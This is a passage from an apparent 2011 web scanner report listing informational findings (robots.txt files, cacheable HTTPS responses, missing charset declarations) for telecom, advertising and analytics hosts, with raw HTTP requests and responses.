Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1769
Expires: Thu, 12 May 2011 00:38:14 GMT
Date: Thu, 12 May 2011 00:08:45 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

24.9. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 00:50:41 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

24.10. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 00:46:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

24.11. http://i.dslr.net/css/aj6m.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.dslr.net
Path:	/css/aj6m.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.dslr.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2687402083"
Last-Modified: Fri, 01 Aug 2008 00:57:47 GMT
Content-Length: 56
Connection: close
Date: Thu, 12 May 2011 00:45:55 GMT
Server: lighttpd/1.4.28

user-agent: *
disallow: /
allow: /iphone_speedtest.html

24.12. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:00 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1b1a-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

24.13. http://investor.hickorytech.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.hickorytech.com
Path:	/phoenix.zhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: investor.hickorytech.com

Response

HTTP/1.0 200 OK
Content-Length: 2676
Content-Type: text/plain
Last-Modified: Thu, 12 May 2011 00:00:01 GMT
Accept-Ranges: bytes
ETag: "80d4338a3710cc1:312e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Thu, 12 May 2011 00:02:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:02:02 GMT
Connection: close

# ========v2.5 - 05/10/10=========================#

User-agent: *
Disallow: /preview
Disallow: /redesign
Disallow: /staging

# ========List of banned bots=========================#

User
...[SNIP]...

24.14. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT
ETag: "cc0d3a-1b-4a1f8e226d640"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 00:04:24 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

24.15. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Thu, 12 May 2011 00:46:25 GMT
Expires: Thu, 12 May 2011 00:46:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

24.16. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:46 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "241115-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www63
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.17. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "e2306-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www59
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.18. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "d58204-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www11
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.19. http://nanpa.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
Last-Modified: Thu, 04 Jun 2009 15:11:03 GMT
ETag: "b4245f-56-46b872f2bcfc0"
Accept-Ranges: bytes
Content-Length: 86
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

# Robot exclusion file
#
# Allow all robots in this directory

User-Agent: *
Allow: /

24.20. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83443807
Expires: Wed, 01 Jan 2014 18:58:51 GMT
Date: Thu, 12 May 2011 00:08:44 GMT
Connection: close

User-agent: *
Disallow: /

24.21. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nextelonline.nextel.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-length: 148
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:51 GMT
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/

24.22. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 21:03:38 GMT
Accept-Ranges: bytes
ETag: "0b110bd9eacc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Thu, 12 May 2011 00:46:40 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

24.23. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 00:48:44 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS

User-agent: *
Disallow: /

24.24. http://s.clickability.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.clickability.com
Path:	/s

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.clickability.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:47 GMT
Server: Apache
ETag: W/"25-1303174878000"
Last-Modified: Tue, 19 Apr 2011 01:01:18 GMT
Content-Length: 25
X-Server-Name: dv-c1-r1-u14-b11
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Set-Cookie: Stats_Session=591922186.20480.0000; path=/

User-agent: *
Disallow: /

24.25. http://shop2.sprint.com/en/support/faq/wlnp.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/en/support/faq/wlnp.shtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop2.sprint.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:01 GMT
Content-type: text/plain
Last-modified: Sat, 14 Mar 2009 10:44:58 GMT
Content-length: 148
Etag: "94-49bb8aaa"
Accept-ranges: bytes
Connection: close

#
# robots.txt for
#
# Dynamic Apps
User-agent: *
Disallow: /NASApp/registration
Disallow: /wps/
User-agent: nol-Ultraseek
Disallow: /wps/

24.26. http://tis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tis.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tis.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:07 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: COOKIE=10.5.16.243.1305160987173669; path=/
Set-Cookie: referrer=; path=/
Set-Cookie: t=ce82d4f07c3011e0a911001372f8117a; path=/
Set-Cookie: referrer=tis.org; path=/
Vary: Accept-Encoding,User-Agent
Cartoon: aalander7
Content-Length: 66
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.tis.org/Sitemap.xml

24.27. http://twitter.com/statuses/user_timeline/secviz.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/statuses/user_timeline/secviz.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:04 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305161344013930; path=/; expires=Thu, 19-May-11 00:49:04 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Fri, 13 May 2011 00:49:04 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

24.28. http://www.911enable.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.911enable.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 Aug 2010 14:23:21 GMT
Accept-Ranges: bytes
ETag: "80d2a16c1733cb1:0"
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:13 GMT
Connection: close
Content-Length: 491

User-agent: *
Disallow: /911form
Disallow: /includes
Disallow: /js
Disallow: /northern_support_center
Disallow: /company
Disallow: /developer_center/
Disallow: /egw_releases_notes/
Disallow: /support_
...[SNIP]...

24.29. http://www.atis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atis.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atis.org

Response

HTTP/1.1 200 OK
Content-Length: 91
Content-Type: text/plain
Last-Modified: Tue, 25 Aug 2009 14:37:45 GMT
Accept-Ranges: bytes
ETag: "2e21f9c9125ca1:1e06"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 00:03:17 GMT
Connection: close

User-Agent: *
Disallow: /_com*/
Disallow: /_mem*/
Disallow: /Board/
Disallow: /_admin*/

24.30. http://www.awltovhc.com/image-1791927-2832191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.awltovhc.com
Path:	/image-1791927-2832191

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Thu, 12 May 2011 00:05:03 GMT

# go away
User-agent: *
Disallow: /

24.31. http://www.catalysttelecom.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.catalysttelecom.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.catalysttelecom.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 01:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Disposition: attachment; filename=robots.txt
Cache-Control: private
Last-Modified: Wed, 16 Dec 2009 20:44:56 GMT
Content-Type: text/plain
Content-Length: 82

User-agent: *
Disallow: /images/
Disallow: /downloads/
Disallow: /sitecore/

24.32. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dslreports.com
Path:	/forum/r25728643-Nettalk-number-portability-

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 00:45:47 GMT
Content-Type: text/plain
Content-Length: 1436
Last-Modified: Fri, 26 Nov 2010 01:40:49 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt for http://www.dslreports.com
User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /tp
Disallow: /r0/download/
Disallow: /postlist/
Disallow: /gmaps/dslr/
Disallow: /autoc
...[SNIP]...

24.33. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.196.42
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

24.34. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 12 May 2011 00:01:57 GMT
Expires: Thu, 12 May 2011 00:01:57 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

24.35. http://www.job-search-engine.com/keyword/number-portability/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.job-search-engine.com
Path:	/keyword/number-portability/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.job-search-engine.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 12 May 2011 00:45:55 GMT
ETag: "1f64104-156-4a2efa2ea7340"
Last-Modified: Tue, 10 May 2011 17:53:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 342
Connection: Close

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: *
Disallow: /maintenance.html
Disallow: /ads/
Disallow: /jad/
Disallow: /job/
Disallow: /perm/
Disallow: /alerts
Disallow: /advertise/login
Disall
...[SNIP]...

24.36. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-991542871"
Last-Modified: Wed, 06 Apr 2011 03:23:57 GMT
Content-Length: 24473
Connection: keep-alive
Date: Thu, 12 May 2011 00:46:47 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

24.37. http://www.nanpa.org/forums/external.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:57 GMT
Server: Apache
Last-Modified: Thu, 04 Jun 2009 15:11:03 GMT
ETag: "b4245f-56-46b872f2bcfc0"
Accept-Ranges: bytes
Content-Length: 86
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

# Robot exclusion file
#
# Allow all robots in this directory

User-Agent: *
Allow: /

24.38. http://www.resourcenter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.resourcenter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Rapidsite/Apa/1.3.31 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.17 OpenSSL/0.9.7c
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi-image/
Disallow: /cgi-local/
Disallow: /online-store/
Disallow: /stats/
Disallow: /webmail/

24.39. http://www.secviz.org/node/89 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.secviz.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:58 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 10 Jun 2008 19:07:29 GMT
ETag: "691-44f54a3b15e40"
Accept-Ranges: bytes
Content-Length: 1681
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

24.40. http://www.stumbleupon.com/hostedbadge.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/hostedbadge.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:49 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Thu, 12 May 2011 00:46:55 GMT
Age: 67
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

24.41. http://www.vonage-forum.com/forum8.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage-forum.com
Path:	/forum8.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vonage-forum.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 03 Mar 2011 04:06:23 GMT
ETag: "138b1cc-1cb4-49d8c270d2dc0"
Accept-Ranges: bytes
Content-Length: 7348
Connection: close
Content-Type: text/plain

Sitemap: http://www.vonage-forum.com/sitemap.xml
User-agent: Slurp
Allow: /
Allow: /ftopic*.html
Allow: /article*.html

User-agent: *
Disallow: admin.php
Disallow: banners.php
Disallow: /admin/
Disall
...[SNIP]...

24.42. http://www.vonage.com/lp/US/afflpdc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 14:14:58 GMT
ETag: "a57036-283-4930d08c79c80"
Accept-Ranges: bytes
Content-Length: 643
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /emails/lnp1/1/
Disallow: /emails/lnp1/2/
Disallow: /emails/lnp1/3/
Disallow: /emails/lnp1/4/
Disallow: /emails/lnp1/5/
Disallow: /emails/lnp1/6/
Disallow: /emails/lnp1/
...[SNIP]...

25. Cacheable HTTPS response previous next
There are 5 instances of this issue:

https://gvnwlnp.com/login.aspx
https://support.connexon.com/sd/AddSolution.sd
https://support.connexon.com/sd/Request.sd
https://support.connexon.com/sd/SolutionsHome.sd
https://www.nationalnanpa.com/nas/public/js/utilities.js

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

25.1. https://gvnwlnp.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gvnwlnp.com
Path:	/login.aspx

Request

Response

25.2. https://support.connexon.com/sd/AddSolution.sd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/AddSolution.sd

Request

Response

25.3. https://support.connexon.com/sd/Request.sd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/Request.sd

Request

Response

25.4. https://support.connexon.com/sd/SolutionsHome.sd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.connexon.com
Path:	/sd/SolutionsHome.sd

Request

Response

25.5. https://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Request

GET /nas/public/js/utilities.js HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_mail.do?method=createNewMode
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:48 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3252
Last-Modified: Fri, 19 Sep 2008 10:26:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

// Move the selected items from list box1 to box2
function moveWithRefresh(lstbox1,lstbox2,doRefresh)
{
var box1Count = lstbox1.options.length;
for(var i=0; i < box1Count; i++)
{
if ( l
...[SNIP]...

26. HTML does not specify charset previous next
There are 13 instances of this issue:

http://fls.doubleclick.net/activityi
https://lnp.activationnow.com/favicon.ico
http://nanpa.com/
http://nanpa.com/contact_us/mailing_list.html
http://nextelonline.nextel.com/tl/set_tl.html
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://shop2.sprint.com/en/support/faq/wlnp.shtml
http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-
http://www.nationalnanpa.com/contact_us/index.cgi
http://www.nationalnanpa.com/contact_us/index.html
http://www.nationalnanpa.com/nas/public/js/utilities.js
http://www.nationalnanpa.com/number_resource_info/area_code_maps.html
https://www.nationalnanpa.com/nas/public/js/utilities.js

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

26.1. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

Response

26.2. https://lnp.activationnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/favicon.ico

Request

Response

26.3. http://nanpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.com
Path:	/

Request

Response

26.4. http://nanpa.com/contact_us/mailing_list.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.com
Path:	/contact_us/mailing_list.html

Request

GET /contact_us/mailing_list.html HTTP/1.1
Host: nanpa.com
Proxy-Connection: keep-alive
Referer: http://nanpa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
